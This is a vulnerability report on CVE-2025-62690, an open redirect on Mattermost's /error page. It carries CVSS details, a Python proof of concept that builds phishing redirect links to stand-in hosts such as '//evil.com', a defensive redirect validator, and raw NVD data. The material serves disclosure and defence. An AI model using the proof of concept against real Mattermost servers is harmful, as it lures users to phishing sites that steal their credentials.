Security Vulnerability Report
CVE-2025-62690 CVSS 3.1 LOW

CVE-2025-62690

Published: 2025-12-17 13:15:59
Last Modified: 2025-12-29 18:55:05

Description

Mattermost versions 10.11.x <= 10.11.4 fail to validate redirect URLs on the /error page, which allows an attacker to redirect a victim to a malicious site via a crafted link opened in a new tab.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
Mattermost 10.11.0
Mattermost 10.11.1
Mattermost 10.11.2
Mattermost 10.11.3
Mattermost 10.11.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62690 PoC - Mattermost Open Redirect
# Target: Mattermost server with vulnerable /error page
import urllib.parse


def generate_malicious_url(target_url, redirect_target):
    """
    Generate malicious URL for open redirect attack

    Args:
        target_url: Target Mattermost server URL (e.g., 'https://mattermost.example.com')
        redirect_target: Malicious redirect target URL

    Returns:
        Malicious URL that exploits the open redirect vulnerability
    """
    # Encode the redirect target to obfuscate
    encoded_redirect = urllib.parse.quote(redirect_target, safe='')
    # Construct the malicious URL pointing to /error page
    malicious_url = f"{target_url}/error?redirect={encoded_redirect}"
    return malicious_url


def generate_phishing_scenario():
    """
    Generate phishing attack scenario URLs
    """
    mattermost_target = "https://mattermost.company.com"
    phishing_site = "https://fake-login.malicious-site.com"
    # Generate the exploit URL
    exploit_url = generate_malicious_url(mattermost_target, phishing_site)
    # Alternative: Direct parameter injection
    alt_exploit_url = f"{mattermost_target}/error?redirect=//evil.com"
    return {
        "description": "Open Redirect Attack via /error page",
        "step1": f"Attacker crafts: {exploit_url}",
        "step2": "Victim receives link via email/chat",
        "step3": "Victim opens link in new tab",
        "step4": "Browser shows legitimate Mattermost domain",
        "step5": f"Browser redirects to: {phishing_site}",
        "result": "Victim enters credentials on phishing site",
    }


# Example usage
if __name__ == "__main__":
    target = "https://mattermost.company.com"
    malicious = "https://attacker-controlled-site.com/fake-login"
    exploit_url = generate_malicious_url(target, malicious)
    print(f"Exploit URL: {exploit_url}")
    scenario = generate_phishing_scenario()
    for key, value in scenario.items():
        print(f"{key}: {value}")
```
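The defensive counterpart to the PoC above, added here as an illustrative example: it is not Mattermost's code and not part of the original report. The description says the /error page fails to validate redirect URLs; the root cause of CWE-601 is handing a caller-supplied target to the browser unchecked. The validator below accepts only same-site targets and goes beyond the two cases the PoC uses (an absolute off-site URL and `//evil.com`) by also rejecting backslash and `///host` variants, control characters, and non-HTTP schemes. The parameter name `redirect` follows the PoC; `allowed_host`, `is_safe_redirect`, `safe_redirect_target` and `resolve_error_page_redirect` are hypothetical names chosen for this example.

```python
"""Illustrative same-site redirect validation (added example, not Mattermost's code)."""
from urllib.parse import parse_qs, urlsplit


def is_safe_redirect(target: str, allowed_host: str) -> bool:
    """Return True only if `target` keeps the browser on `allowed_host`.

    Accepted:
      - a plain absolute path such as "/channels/town-square"
      - an absolute http(s) URL whose host is exactly `allowed_host`
    Rejected:
      - empty targets
      - whitespace or control characters (can smuggle a second URL)
      - backslashes, which some browsers normalise to "/" (e.g. "/\\evil.com")
      - scheme-relative "//host" and "///host" forms, resolved off-site
      - non-http(s) schemes such as "javascript:" or "data:"
      - absolute URLs whose host (including user@host tricks) differs
    """
    if not target:
        return False
    if any(ord(c) < 0x20 or c in " \t\r\n" for c in target):
        return False
    if "\\" in target:
        return False
    try:
        parts = urlsplit(target)
    except ValueError:  # e.g. malformed IPv6 brackets
        return False
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):
            return False
        # Exact host match; a port or userinfo in netloc makes this fail closed.
        return parts.netloc.lower() == allowed_host.lower()
    # Schemeless: must be a single-slash path. urlsplit puts "//evil.com" in
    # netloc, but "///evil.com" yields an empty netloc, hence the prefix check.
    if parts.netloc:
        return False
    return target.startswith("/") and not target.startswith("//")


def safe_redirect_target(target: str, allowed_host: str, fallback: str = "/") -> str:
    """Return `target` if it passes validation, otherwise a safe local fallback."""
    return target if is_safe_redirect(target, allowed_host) else fallback


def resolve_error_page_redirect(request_url: str, fallback: str = "/") -> str:
    """Simulate a hardened /error handler (hypothetical): take the `redirect`
    query parameter from the request URL and validate it against the host the
    request was made to, so a crafted link can only send the user back to the
    same site."""
    parts = urlsplit(request_url)
    target = parse_qs(parts.query).get("redirect", [""])[0]  # parse_qs percent-decodes
    return safe_redirect_target(target, parts.netloc, fallback)


if __name__ == "__main__":
    # Constructed sample links in the shape the PoC builds.
    host = "https://mattermost.company.com"
    for link in (
        f"{host}/error?redirect=%2Fchannels%2Ftown-square",
        f"{host}/error?redirect=//evil.com",
        f"{host}/error?redirect=https%3A%2F%2Ffake-login.malicious-site.com",
    ):
        print(link, "->", resolve_error_page_redirect(link))
```

The handler is deliberately allow-list based: rather than trying to spot every off-site encoding, it recognises the two shapes a legitimate in-app redirect can take and sends anything else to the fallback, which is the pattern a fix for this class of bug should follow.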

References

https://mattermost.com/security-updates (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-62690",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-17T13:15:58.510",
    "lastModified": "2025-12-29T18:55:05.180",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Mattermost versions 10.11.x <= 10.11.4 fail to validate redirect URLs on the /error page, which allows an attacker to redirect a victim to a malicious site via a crafted link opened in a new tab."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 3.1,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-601"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "10.11.0",
                "versionEndExcluding": "10.11.5",
                "matchCriteriaId": "A8368192-621C-4043-827E-DB4F6946AD92"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://mattermost.com/security-updates",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```